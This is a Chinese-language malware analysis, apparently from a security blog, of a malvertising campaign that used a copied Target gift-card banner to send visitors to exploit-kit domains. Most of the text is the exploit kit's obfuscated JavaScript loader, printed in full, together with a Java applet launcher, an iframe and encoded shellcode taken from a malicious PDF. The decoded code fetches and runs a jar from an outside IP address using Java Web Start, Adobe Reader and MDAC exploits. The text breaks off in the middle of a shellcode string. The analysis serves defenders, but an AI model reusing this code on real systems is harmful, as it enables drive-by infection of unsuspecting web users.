在上面的這段script, colemuns.com/pubseg/show.php就是exploit所在。它也利用一個機制(在var statictml及all_t那段code)來檢查參訪者的時區,能讓它有能力依據不同的時區產生出特定的iframe,不過這一段在這次攻擊中似乎沒派上用場。
http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf is the actual banner that gets displayed, which is copied from Target:
在這邊acerdse.com, blindry.com, careepi.com, and colemuns.com這幾個網域在正查後,都指到同一個IP位址91.213.217.194,用來交替使用來放置exploit的。 這個exploits的程式碼如下:
<html><body><div id="obj"></div><div id="pdf"></div><div id="java"></div><script>host = "h$$t$$tp:/$$$/$$co$$$l$$$$e$$$mun$$s$$.co$$m$$$/$$p$$u$$$p$$s$$$$e$$g$$"; host = host.replace(/[$]/g, ""); key = "92e93d0553cdb3c89d7d397457811f6d"; user = "root";</script>
<applet code='main.class' archive='26dd43dcf27/105aac7339e.jar' width='255' height='136'><param name='game_id' VALUE='i//WgzzL5CmfpbXJL5fzWpWXmezq5jpfJWiWIq9Zh&hPHS:DmK9dwmdEvuQQELv#ELldvNvEdNkQNl==qnv:p9j55/'></applet><script>var iirduoa613057 = "_4044d626a1c";var aaxiubfm563272 = "_01ad045ecb0";var nizzuyweo160751 = "_93462cf8707";var feihoaejc896221 = "_aa4b7467bcb";var ev = 'yeegsgvsssaglh';/* aexzwfu263553 = 96; <ouafo10632> */var vuuyey275779 = "_aa398c568ba";var eurtpji70479 = "_c5fb02cb5f1";var dyeiya128404 = "_61d73e9a8f2";/* angfo215506 = 35; <vewoxiaiua264194> */var moiliauca38982161 = '223123 - 1213';this[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('var th = thi'+'s[\'ev\'+\'\'+\'al\'];');var moiliauca38229861 = '223123 - 1213';/* uxoexyk720677 = 80; <qrybyerce87643> */var eoegeoypam602661 = "_a05c49dbaf1";var uadviiio547663 = "_20bc608bd2a";qrsyuoihooa = 'QQQ\rQQQ\nQQQ QQQ QQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQpQQQdQQQfQQQ_QQQiQQQeQQQ(QQQ)QQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ{QQQ\rQQQ\nQQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQoQQQbQQQjQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\"QQQ<QQQOQQQBQQQJQQQEQQQCQQQTQQQ QQQiQQQdQQQ=QQQjQQQdQQQfQQQ1QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ0QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ0QQQ QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ=QQQcQQQlQQQsQQQiQQQdQQQ:QQQCQQQAQQQ8QQQAQQQ9QQQ7QQQ8QQQ0QQQ-QQQ2QQQ8QQQ0QQQDQQQ-QQQ1QQQ1QQQCQQQFQQQ-QQQAQQQ2QQQ4QQQDQQQ-QQQ4QQQ4QQQ4QQQ5QQQ5QQQ3QQQ5QQQ4QQQ0QQQ0QQQ0QQQ0QQQ>QQQ<QQQ/QQQOQQQBQQQJQQQEQQQCQQQTQQQ>QQQ\"QQQ;QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQjQQQdQQQfQQQ1QQQ.QQQGQQQeQQQtQQQVQQQeQQQrQQQsQQQiQQQoQQQnQQQsQQQ(QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ,QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ=QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ;QQQ\rQQQ\nQQQ QQQiQQQfQQQ QQQ(QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ7QQQ.QQQ1QQQ.QQQ4QQQ\"QQQ)QQQ QQQQQQQQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ8QQQ.QQQ1QQQ.QQQ7QQQ\"QQQ)QQQ QQQQQQQQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ9QQQ.QQQ2QQQ\"QQQ)QQQ)QQQ\rQQQ\nQQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQpQQQdQQQfQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\'QQQ<QQQiQQQfQQQrQQQaQQQmQQQeQQQ QQQsQQQrQQQcQQQ=QQQ\"QQQ2QQQ6QQQdQQQdQQQ4QQQ3QQQdQQQcQQQfQQQ2QQQ7QQQ/QQQ2QQQeQQQaQQQ0QQQbQQQbQQQbQQQ7QQQ7QQQ4QQQfQQQ.QQQpQQQhQQQpQQQ?QQQhQQQoQQQsQQQtQQQ=QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ\"QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQfQQQrQQQaQQQmQQQeQQQbQQQoQQQrQQQdQQQeQQQrQQQ=QQQ\"QQQ1QQQ\"QQQ>QQQ<QQQ/QQQiQQQfQQQrQQQaQQQmQQQeQQQ>QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ}QQQ QQQ\rQQQ\nQQQ QQQ}QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ QQQ{QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQsQQQeQQQtQQQTQQQiQQQmQQQeQQQoQQQuQQQtQQQ(QQQpQQQdQQQfQQQ_QQQiQQQeQQQ,QQQ QQQ4QQQ0QQQ0QQQ0QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ\rQQQ\nQQQ\rQQQ\nQQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQjQQQdQQQtQQQ(QQQ)QQQ\rQQQ\nQQQ{QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQuQQQ QQQ=QQQ QQQ\'QQQhQQQtQQQtQQQpQQQ:QQQ QQQ-QQQJQQQ-QQQjQQQaQQQrQQQ QQQ-QQQJQQQ\\QQQ\\QQQ\\QQQ\\QQQ1QQQ9QQQ5QQQ.QQQ5QQQ.QQQ1QQQ6QQQ1QQQ.QQQ1QQQ0QQQ\\QQQ\\QQQpQQQuQQQbQQQlQQQiQQQcQQQ\\QQQ\\QQQjQQQaQQQvQQQaQQQ.QQQjQQQaQQQrQQQ QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ/QQQfQQQoQQQrQQQuQQQmQQQ.QQQpQQQhQQQpQQQ?QQQfQQQ=QQQSQQQMQQQBQQQ&QQQkQQQeQQQyQQQ=QQQ\'QQQ+QQQkQQQeQQQyQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ QQQnQQQoQQQnQQQeQQQ\'QQQ;QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQiQQQfQQQ QQQ(QQQwQQQiQQQnQQQdQQQoQQQwQQQ.QQQnQQQaQQQvQQQiQQQgQQQaQQQtQQQoQQQrQQQ.QQQaQQQpQQQpQQQNQQQaQQQmQQQeQQQ QQQ=QQQ=QQQ QQQ\'QQQMQQQiQQQcQQQrQQQoQQQsQQQoQQQfQQQtQQQ QQQIQQQnQQQtQQQeQQQrQQQnQQQeQQQtQQQ QQQEQQQxQQQpQQQlQQQoQQQrQQQeQQQrQQQ\'QQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQiQQQ\'QQQ+QQQ\'QQQdQQQ:QQQCQQQAQQQFQQQEQQQEQQQ\'QQQ+QQQ\'QQQFQQQAQQQCQQQ-QQQDQQQEQQQCQQQ\'QQQ+QQQ\'QQQ7QQQ-QQQ0QQQ0QQQ0QQQ\'QQQ+QQQ\'QQQ0QQQ\'QQQ+QQQ\'QQQ-QQQ0QQQ0QQQ0QQQ0QQQ-QQQAQQQBQQQCQQQ\'QQQ+QQQ\'QQQDQQQEQQQFQQQFQQQEQQQDQQQCQQQBQQQAQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ2QQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQ\'QQQ+QQQ\'QQQiQQQdQQQ:QQQ8QQQAQQQDQQQ9QQQ\'QQQ+QQQ\'QQQCQQQ8QQQ4QQQ0QQQ-QQQ0QQQ4QQQ4QQQ\'QQQ+QQQ\'QQQEQQQ-QQQ1QQQ1QQQDQQQ1QQQ-QQQBQQQ\'QQQ+QQQ\'QQQ3QQQEQQQ9QQQ-QQQ0QQQ0QQQ8QQQ0QQQ5QQQ\'QQQ+QQQ\'QQQFQQQ4QQQ\'QQQ+QQQ\'QQQ9QQQ9QQQDQQQ9QQQ3QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQeQQQlQQQsQQQeQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQnQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQtQQQyQQQpQQQeQQQ QQQ=QQQ QQQ\'QQQaQQQ\'QQQ+QQQ\'QQQpQQQpQQQlQQQiQQQcQQQaQQQtQQQ\'QQQ+QQQ\'QQQiQQQoQQQnQQQ/QQQnQQQpQQQrQQQuQQQnQQQtQQQ\'QQQ+QQQ\'QQQiQQQmQQQeQQQ-QQQsQQQcQQQrQQQ\'QQQ+QQQ\'QQQiQQQpQQQtQQQaQQQbQQQlQQQeQQQ-QQQpQQQlQQQuQQQ\'QQQ+QQQ\'QQQgQQQiQQQnQQQ;QQQdQQQeQQQpQQQlQQQoQQQyQQQmQQQeQQQ\'QQQ+QQQ\'QQQnQQQtQQQtQQQoQQQoQQQ\'QQQ+QQQ\'QQQlQQQkQQQiQQQtQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQnQQQ.QQQtQQQyQQQpQQQeQQQ QQQ=QQQ QQQ\'QQQaQQQpQQQ\'QQQ+QQQ\'QQQpQQQlQQQiQQQcQQQaQQQtQQQiQQQ\'QQQ+QQQ\'QQQoQQQnQQQ/QQQjQQQaQQQvQQQaQQQ-QQQdQQQeQQQpQQQ\'QQQ+QQQ\'QQQlQQQoQQQyQQQmQQQeQQQnQQQ\'QQQ+QQQ\'QQQtQQQ-QQQtQQQoQQQoQQQlQQQ\'QQQ+QQQ\'QQQkQQQiQQQtQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQbQQQoQQQdQQQyQQQ.QQQaQQQpQQQpQQQeQQQnQQQdQQQCQQQhQQQiQQQlQQQdQQQ(QQQoQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQbQQQoQQQdQQQyQQQ.QQQaQQQpQQQpQQQeQQQnQQQdQQQCQQQhQQQiQQQlQQQdQQQ(QQQnQQQ)QQQ;QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ QQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQnQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ QQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ}QQQ\rQQQ\nQQQ\rQQQ\nQQQsQQQeQQQtQQQTQQQiQQQmQQQeQQQoQQQuQQQtQQQ(QQQjQQQdQQQtQQQ,QQQ QQQ3QQQ0QQQ0QQQ0QQQ)QQQ;QQQ\rQQQ\nQQQ\rQQQ\n';th("var bryoyiiayf = qrsyuoihooa.re"+"pla"+"ce(/[Q]/g,'');");var iqiav513852 = "_34a70f40656";/* bizpgyuaq305961 = 23; <exygu793510> */var eaiyaiaker752902 = "_c6b2a3a99fd";/* ziueaftwo749548 = 4; <gfihyc401172> *//* yauspgue593149 = 87; <faaynejeb207427> *//* oojqoi37339 = 71; <oieea506353> */var aykya290626 = "_76e3862ecd0";/* vouiiiiwl471445 = 97; <uaiih853631> */var oasxf283400 = "_ba13a57cbfd";/* eaojumj532053 = 3; <ehetan555132> */var oecryyamioy = 100;/* iezoiooe974360 = 10; <amolbyey364709> */var fasmeeiuyc847930 = "_08c893ddaac";/* yglyeazy825857 = 62; <xaoowyyv838265> */var iluieumjyu1486 = "_71331be6e91";var adoamiqpuei = '';/* dozjihey311662 = 80; <gewaeaoyu25937> *//* iuywiuy421415 = 53; <oiueuci618667> *//* eufec965915 = 38; <peluoue227579> */var aaouuu689519 = "_de3a4f69c12";/* mkilo920520 = 7; <azaeed813114> */ioyokeiueonu0 = bryoyiiayf;var ahxey783267 = "_f658c39a7d9";var iuouubei905581 = "_ed00bc42d89";var oliiur11273 = "_358c9003f99";/* yuhwaocuyy730219 = 58; <aogiupi451628> */var ylishbuy295077 = "_e8ff910a6f3";for(zeozuoutue=0;zeozuoutue<oecryyamioy;zeozuoutue++) {var kumoualvyo = 'function a1083435135(fa) {return fa;} var a506424832 = 991968621;function a486745355(fa) {return fa;} var a631530080 = 378464516;function a112875451(fa) {return fa;} var a1108616833 = 773453236;function a94842624(fa) {return fa;} var a973149738 = 1278431189;function a162114306(fa) {return fa;} var a18855745 = 716737348;function a699605006(fa) {return fa;} var a1049377591 = 1147700637;';var kumoualvyo = kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo;var kumoualvyo = kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo;var dsfsg = zeozuoutue+1;adoamiqpuei = 'var ioyokeiueonu'+dsfsg+'=ioyokeiueonu'+zeozuoutue+';'+kumoualvyo+''+kumoualvyo+''+kumoualvyo+'';th(adoamiqpuei);}th(ioyokeiueonu100);var yuuipiei717018 = "_4af7228fb04";/* uirofytouo523761 = 37; <egvdg176208> *//* nezqbovly381813 = 63; <adudbos234926> *//* teusoekl365197 = 71; <asrouyquig347789> */</script>
上面這段code解碼後如下:
這邊我們可以看到它使用了三個exploits:
JDT: Java Web Start Arbitrary command-line injection (CVE-2010-0886)
Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)
Microsoft MDAC RDS.Dataspace ActiveX (CVE-2006-0003)
還有些Exploit code是放在PDF檔案的內部http://colemuns.com/pupseg/26dd43dcf27/2ea0bbb774f.php?host=http://colemuns.com/pupseg&u=root
將PDF中的Javascripts萃取出來內容如下:
//-------------------------------------------------------------
//-----------------Do not edit the XML tags--------------------
//-------------------------------------------------------------
//<Document-Actions>
//<ACRO_source>Document Open</ACRO_source>
//<ACRO_script>
/*********** belongs to: Document-Actions:Document Open ***********/
function ghfsdj(adbhsdh)
{
var jfsd = "gas%ss2u";
return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);
}
shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3E1&&EFD2&&C9C5&&8FC8&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");
shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3C8&&F6D1&&C7CA&&C3DF&&8FD4&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");
shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&D4D6&&C8CF&&C0D2&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");
shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C9E5&&CACA&&C4C7&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");
var yiypg414830 = "_cc574b95084";var cwyuonoyo302180 = "_4b79760e42c";/* muuavvusau495652 = 46; <uauogigqoh191543> */var uuyaeiqe228524 = "_71a45be3b60";var ev = 'yeegsgvsssaglh';var oepeyeeupo553973 = "_46637835fbf";var iheao826985 = "_2b7a51658e4";var ahaaueui531169 = "_54df0b74788";var ueuieozhyl59534 = "_e6935076301";/* uorjo80661 = 37; <ehisoe602997> */var moiliauca38982161 = '223123 - 1213';this[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('var th = thi'+'s[\'ev\'+\'\'+\'al\'];');var moiliauca38229861 = '223123 - 1213';var yuuei247913 = "_0456ff91871";/* yukfbzyi678025 = 64; <uzieq740219> */var yoiaoia3559 = "_9ae0a50e46f";/* jhwatwt700250 = 30; <xuyuuixa526322> */var uyuziauiwa806528 = "_754b4ff18a5";/* oyiyaaiee996158 = 18; <ofturo539858> */cwyuvaooeo = 'YYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYYdYYY_YYYuYYYrYYYlYYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYrYYYeYYYtYYYuYYYrYYYnYYY YYY\"YYY%YYYuYYY1YYY1YYYEYYYBYYY%YYYuYYY4YYYBYYY5YYYBYYY%YYYuYYYCYYY9YYY3YYY3YYY%YYYuYYY8YYY1YYY6YYY6YYY%YYYuYYYAYYYFYYYCYYY9YYY%YYYuYYY8YYY0YYY0YYY1YYY%YYYuYYY0YYYBYYY3YYY4YYY%YYYuYYYEYYY2YYYAYYY6YYY%YYYuYYYEYYYBYYYFYYYAYYY%YYYuYYYEYYY8YYY0YYY5YYY%YYYuYYYFYYYFYYYEYYYAYYY%YYYuYYYFYYYFYYYFYYYFYYY%YYYuYYY7YYYCYYY4YYYFYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYFYYY9YYYAYYY6YYY%YYYuYYY0YYY7YYYCYYY2YYY%YYYuYYYAYYY6YYY9YYY6YYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYEYYY6YYY2YYYDYYY%YYYuYYY2YYYDYYYAYYYAYYY%YYYuYYYBYYYAYYYDYYY6YYY%YYYuYYY2YYYDYYY0YYYBYYY%YYYuYYYAYYYEYYYCYYYEYYY%YYYuYYYDYYY6YYY2YYYDYYY%YYYuYYY2YYYDYYY8YYY6YYY%YYYuYYY2YYY6YYYAYYY6YYY%YYYuYYYCYYYDYYY9YYY8YYY%YYYuYYY5YYY5YYYDYYY3YYY%YYYuYYYEYYY0YYYEYYY0YYY%YYYuYYY9YYY8YYY2YYY6YYY%YYYuYYYDYYY3YYYCYYY3YYY%YYYuYYYEYYY0YYY4YYYAYYY%YYYuYYY2YYY6YYYEYYY0YYY%YYYuYYYDYYY4YYY9YYY8YYY%YYYuYYY5YYY1YYYDYYY3YYY%YYYuYYYEYYY0YYYEYYY0YYY%YYYuYYY9YYY8YYY2YYY6YYY%YYYuYYYDYYY3YYYCYYY8YYY%YYYuYYY2YYYDYYY5YYY6YYY%YYYuYYYCYYYCYYY5YYY1YYY%YYYuYYYFYYYFYYYAYYY5YYY%YYYuYYYFYYYDYYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYY4YYY4YYYAYYY6YYY%YYYuYYYCYYYEYYY5YYYFYYY%YYYuYYYCYYY8YYYCYYY9YYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYDYYY3YYYCYYYEYYY%YYYuYYYCYYYAYYYDYYY4YYY%YYYuYYYFYYY2YYYCYYYBYYY%YYYuYYYBYYY0YYY5YYY9YYY%YYYuYYY4YYYEYYY2YYYDYYY%YYYuYYYEYYY3YYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYCYYYEYYYAYYY6YYY%YYYuYYY9YYY5YYYCYYYAYYY%YYYuYYYAYYY6YYY9YYY4YYY%YYYuYYYDYYY5YYYCYYYEYYY%YYYuYYYCYYY3YYYCYYYEYYY%YYYuYYYFYYY2YYYCYYYAYYY%YYYuYYYBYYY0YYY5YYY9YYY%YYYuYYY4YYYEYYY2YYYDYYY%YYYuYYY9YYY7YYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYY2YYY5YYYAYYY6YYY%YYYuYYYEYYY6YYY4YYYAYYY%YYYuYYY7YYYAYYY2YYYDYYY%YYYuYYYCYYYCYYYFYYY5YYY%YYYuYYY5YYY9YYYEYYY6YYY%YYYuYYYAYYY2YYYFYYY0YYY%YYYuYYYAYYY2YYY6YYY1YYY%YYYuYYYCYYY7YYYAYYY5YYY%YYYuYYYCYYY3YYY8YYY8YYY%YYYuYYYCYYY0YYYDYYYEYYY%YYYuYYYEYYY2YYY6YYY1YYY%YYYuYYYAYYY2YYYAYYY5YYY%YYYuYYYAYYY6YYYCYYY3YYY%YYYuYYY6YYY6YYY9YYY5YYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY1YYYFYYY5YYY%YYYuYYY5YYY9YYYFYYY6YYY%YYYuYYYAYYYAYYYFYYY0YYY%YYYuYYY7YYYAYYY2YYYDYYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY5YYYFYYY6YYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY0YYY5YYY9YYY%YYYuYYY5YYY9YYYBYYY6YYY%YYYuYYYAYYYEYYYFYYY0YYY%YYYuYYYFYYY0YYYFYYY7YYY%YYYuYYYDYYY3YYY2YYYDYYY%YYYuYYY2YYYDYYY9YYYAYYY%YYYuYYY8YYY8YYYDYYY2YYY%YYYuYYYAYYY5YYYDYYYEYYY%YYYuYYYFYYY0YYY5YYY3YYY%YYYuYYYDYYY0YYY2YYYDYYY%YYYuYYYAYYY5YYY8YYY6YYY%YYYuYYY9YYY5YYY5YYY3YYY%YYYuYYYEYYYFYYY6YYYFYYY%YYYuYYY0YYYBYYYEYYY7YYY%YYYuYYY6YYY3YYYAYYY5YYY%YYYuYYY7YYYDYYY9YYY5YYY%YYYuYYY1YYY8YYYAYYY9YYY%YYYuYYY9YYYCYYYBYYY6YYY%YYYuYYYDYYY2YYY7YYY0YYY%YYYuYYY6YYY7YYYAYYYEYYY%YYYuYYYAYYYBYYY6YYYDYYY%YYYuYYY7YYYCYYYAYYY5YYY%YYYuYYY4YYYDYYYEYYY6YYY%YYYuYYY9YYYDYYY5YYY7YYY%YYYuYYYDYYY3YYYBYYY9YYY%YYYuYYYFYYY8YYY4YYY1YYY%YYYuYYYFYYY8YYY2YYYDYYY%YYYuYYYAYYY5YYY8YYY2YYY%YYYuYYYCYYY0YYY7YYYBYYY%YYYuYYYAYYYAYYY2YYYDYYY%YYYuYYY2YYYDYYYEYYYDYYY%YYYuYYYBYYYAYYYFYYY8YYY%YYYuYYY7YYYBYYYAYYY5YYY%YYYuYYYAYYY2YYY2YYYDYYY%YYYuYYYAYYY5YYY2YYYDYYY%YYYuYYY0YYYD